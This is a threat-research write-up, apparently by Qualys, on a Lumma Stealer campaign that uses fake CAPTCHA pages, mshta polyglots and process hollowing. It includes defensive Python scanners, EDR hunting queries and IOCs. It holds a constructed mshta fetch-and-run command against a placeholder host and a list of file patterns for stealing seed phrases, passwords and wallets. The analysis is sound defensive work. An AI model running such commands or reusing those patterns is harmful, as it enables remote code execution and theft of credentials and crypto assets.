Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Last updated on: October 22, 2024
Summary
Lumma Stealer is an information-stealing malware available through a Malware-as-a-Service (MaaS) model. It specializes in stealing sensitive data such as passwords, browser information, and cryptocurrency wallet details. The attacker has advanced its tactics, moving from traditional phishing to fake CAPTCHA verification and exploiting legitimate software to deliver Lumma Stealer. These deceptive delivery methods make Lumma Stealer a persistent threat.
Threat actors frequently create phishing sites hosted on various providers, often leveraging Content Delivery Networks (CDNs). These sites either use exploits or trick users into executing the payload. The Qualys Threat Research Unit (TRU) has been monitoring an active Lumma Stealer campaign. Recently, we came across the use of fake CAPTCHA pages to trick users into executing the payload. The campaign uses multi-stage fileless techniques to deliver its final payload, which makes this threat deceptive and persistent.
We investigated the entire attack chain, from initial infection to data exfiltration, and used Qualys EDR to show how it can protect against such threats. We also provide key threat detection and hunting queries that analysts can add to their playbooks to help protect against such threats in real time.
Campaign Analysis
- We speculate that users are redirected to these fake CAPTCHA sites by bad actors exploiting legitimate software or public-facing applications. When the user clicks the ‘I’m not a robot’ button, verification steps are presented. Completing these steps triggers the execution of a PowerShell command that initiates the download of an initial stager (malware downloader) on the target machine.
Figure 2: Captcha Click and Verification
The webpage code reveals an embedded payload, where a function called ‘verify’ contains a Base64-encoded PowerShell script that is copied to the clipboard when the verification button is pressed.
- Mshta.exe is a trusted Windows tool for running HTML applications and embedded scripts. When a URL is passed to mshta, it downloads a remote payload and places it in the INetCache directory. The downloaded file ‘2ndhsoru’ is a crafted PE file of the Windows tool “Dialer.exe” with a script in its overlay section. We dumped the overlay section and extracted the script, which is obfuscated JavaScript code (Figure 7). The payload uses an interesting technique called a polyglot, where valid HTA content is embedded inside other files that are directly executable by mshta. The script’s trigger point is an eval function that executes the JavaScript code (Figure 8).
Figure 5: Overlay Section of PE
Figure 6: Start of Script in Overlay Section
Figure 7: JS Script in Overlay Section
Figure 8: Mshta Executes the JS Script
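A defender can triage this kind of polyglot by locating the PE overlay (the bytes after the last section's raw data) and checking it for script content. The following is an added example, not code from the Qualys analysis; the function names, the marker list, and the sample file built in `build_sample` are constructed for illustration.

```python
import struct

# Strings that suggest script/HTA content (marker list chosen for this example).
MARKERS = (b"<script", b"<hta:application", b"eval(")

def pe_overlay(data: bytes) -> bytes:
    """Return the bytes stored after the last section's raw data (the overlay)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    (pe_off,) = struct.unpack_from("<I", data, 0x3C)            # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    (n_sections,) = struct.unpack_from("<H", data, pe_off + 6)  # NumberOfSections
    (opt_size,) = struct.unpack_from("<H", data, pe_off + 20)   # SizeOfOptionalHeader
    table = pe_off + 24 + opt_size                              # first section header
    end = 0
    for i in range(n_sections):
        # SizeOfRawData and PointerToRawData sit at offsets 16 and 20 of each header.
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return data[end:]

def script_markers(overlay: bytes) -> list[str]:
    """List the markers found in the overlay, case-insensitively.

    An overlay alone is not suspicious: signed files keep their certificate
    table there. Script text after the last section is the signal of interest.
    """
    low = overlay.lower()
    return [m.decode() for m in MARKERS if m in low]

def build_sample() -> bytes:
    """Constructed input: a header-only PE stub followed by a harmless script."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)            # e_lfanew = 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)
    sect = b".text\0\0\0" + struct.pack("<IIII", 16, 0x1000, 16, 128) + b"\0" * 16
    image = dos + coff + sect + b"\x90" * 16                    # raw data at 128..143
    return image + b"<script>eval('1+1')</script>"

if __name__ == "__main__":
    overlay = pe_overlay(build_sample())
    print(len(overlay), script_markers(overlay))
```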
- The obfuscated JS script reveals a PowerShell script. This PowerShell script contains an AES-encrypted payload and a routine to decrypt it in CBC mode using a hardcoded decryption key. The script also employs simple arithmetic obfuscation techniques. We have normalized variables and functions in the PS script, revealing how the script downloads and executes the payload (Figure 10).
Figure 9: Encrypted PS Script
- The final PS script downloads ‘K1.zip’ and ‘K2.zip’ into a temporary directory, extracts the contents, and executes “VectirFree.exe” (Lumma Stealer), as shown in Figure 10 above. K1.zip contains DLLs and K2.zip contains “VectirFree.exe”.
- VectirFree.exe employed process hollowing, a common tactic used by malware to evade detection. It targeted a legitimate program, “BitLockerToGo.exe,” to inject its malicious payload.
- Additionally, BitLockerToGo drops files in the temp directory. 72RC2SM21DDZ2OAH3P30V1XPT5AE7YN.exe copies “Killing.bat” and “Voyuer.pif” into the same directory. The bat script is obfuscated and checks for antivirus processes such as wrsa.exe (Webroot Antivirus Component), opssvc.exe (Quick Heal Antivirus Component), and bdservicehost.exe (Bitdefender), among others, using tasklist and findstr.
- The malware initiates a search for sensitive files and data related to cryptocurrency and password text files across various directories on the compromised system. It specifically looks for files whose names contain keywords suggesting they may hold confidential information, such as *seed*.txt, *pass*.txt, *.kbdx, *ledger*.txt, *trezor*.txt, *metamask*.txt, bitcoin*.txt, *word*, *wallet*.txt.
- Lumma Stealer communicates with command and control (C2) servers to exfiltrate stolen data after infecting a system. It tries to connect to C2 server domains with the “.shop” top-level domain (TLD). Currently, these C2 servers are unreachable. As noted earlier, threat actors employ Content Delivery Networks (CDNs) for payload delivery and C2 servers for data exfiltration. In this case, we found the use of Cloudflare CDN, which is included in the Indicators of Compromise (IoC).
How Qualys EDR Protects
Preventing the Threat
The moment PowerShell tries to execute the malicious command on an endpoint, Qualys EDR identifies and prevents the fileless malware attack during the pre-execution stage by terminating the PowerShell instance. This breaks the chain of attack at the initial stage and prevents the downloading of any further malicious payload. Early prevention is crucial in protecting against sensitive data leakage and exfiltration.
Detection and Hunting
Lumma Stealer was executed and analyzed in the Qualys Research environment, where the EDR system was set to detect only.
- The ‘AMSI’ feature in Qualys EDR allows us to view the de-obfuscated code of executed obfuscated scripts. Let’s search for the encoded payload executed by PowerShell. We can see that the argument contains a Base64-encoded payload, and the “Script Content” reveals the corresponding de-obfuscated details.
- We know that the mshta process is responsible for communicating with the C2 server for further payload delivery, so we can filter the events on it and see the downloaded file.
- If we explore that event in the process tree, mshta.exe executes the PS script payload after downloading from the C2.
- By filtering the event with “parent.name:Voyuer.pif”, we see that Voyuer.pif (Autoit.exe) drops “QuantumLink.scr” and “a” (copy of c.a3x).
Figure 26: Operation Performed by Voyuer.pif
- Here are the Qualys Hunting queries that will allow you to investigate the threat.
Description | Query |
---|---|
PowerShell executes embedded code | process.name:"powershell.exe" and process.arguments: ["-e", "-ec", "-enc", "-enco", "encodedCommand"] |
PE File created by process (mshta) | process.parentname: mshta.exe and action: created and file.type: PE |
File created by PowerShell, and it is detected by EPP | parent.name:"powershell.exe" and type: file and event.scoresource: "Anti-malware" |
Obfuscation technique performed by PowerShell | mitre.attack.technique.id: T1027 and process.name:powershell.exe |
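Where process command lines are available outside the EDR console, the first query's logic can be paired with decoding so the analyst sees what the Base64 argument contains. This is an added example, not a Qualys tool: the function names and the sample command line (with a placeholder `example.invalid` URL) are constructed, and it goes slightly beyond the query by accepting every abbreviation of `-EncodedCommand` that PowerShell accepts.

```python
import base64
import re

URL = re.compile(r"https?://[^\s'\"]+", re.I)
MSHTA = re.compile(r"\bmshta(\.exe)?\b", re.I)

def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries -EncodedCommand, else None."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        name = flag.lstrip("-/").lower()
        # PowerShell accepts any prefix of -EncodedCommand, plus the alias -ec.
        is_flag = flag[:1] in "-/" and name and (
            "encodedcommand".startswith(name) or name == "ec")
        if is_flag:
            try:
                raw = base64.b64decode(value.strip("'\""), validate=True)
                return raw.decode("utf-16-le")   # the flag expects UTF-16LE text
            except ValueError:                   # bad Base64 or bad UTF-16
                return None
    return None

def triage(cmdline: str) -> dict:
    """Summarise what an encoded PowerShell command line would run."""
    script = decode_encoded_command(cmdline)
    return {
        "encoded": script is not None,
        "script": script,
        "spawns_mshta": bool(script and MSHTA.search(script)),
        "urls": URL.findall(script or ""),
    }

def sample_cmdline() -> str:
    """Constructed sample shaped like the chain described above (placeholder URL)."""
    script = "mshta https://example.invalid/stage1"
    b64 = base64.b64encode(script.encode("utf-16-le")).decode()
    return f"powershell.exe -eC {b64}"

if __name__ == "__main__":
    print(triage(sample_cmdline()))
```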
Conclusion
The investigation into Lumma Stealer reveals an evolving threat landscape characterized by the malware’s ability to adapt and evade detection. It employs a variety of tactics, from leveraging legitimate software to utilizing deceptive delivery methods, making it a persistent challenge for security teams. Our analysis of its infection chain highlighted how the fileless malware exploits common tools like PowerShell and mshta.exe, as well as the critical role of embedded payloads and process injection in its operations.
Qualys EDR demonstrates value in detecting and responding to such threats. As you can see, early prevention (Figure 27) can stop this attack chain and its potential impact on an organization.
Figure 27: Threat Chain from EDR
MITRE ATT&CK Techniques
IOCs
Domain
Files
IP
IP | Usage Type |
---|---|
172.67.209.145 | Cloudflare CDN |
104.21.77.155 | Cloudflare CDN |
Contributors
Alisha Kadam, Senior Threat Research Engineer, Threat Research, Qualys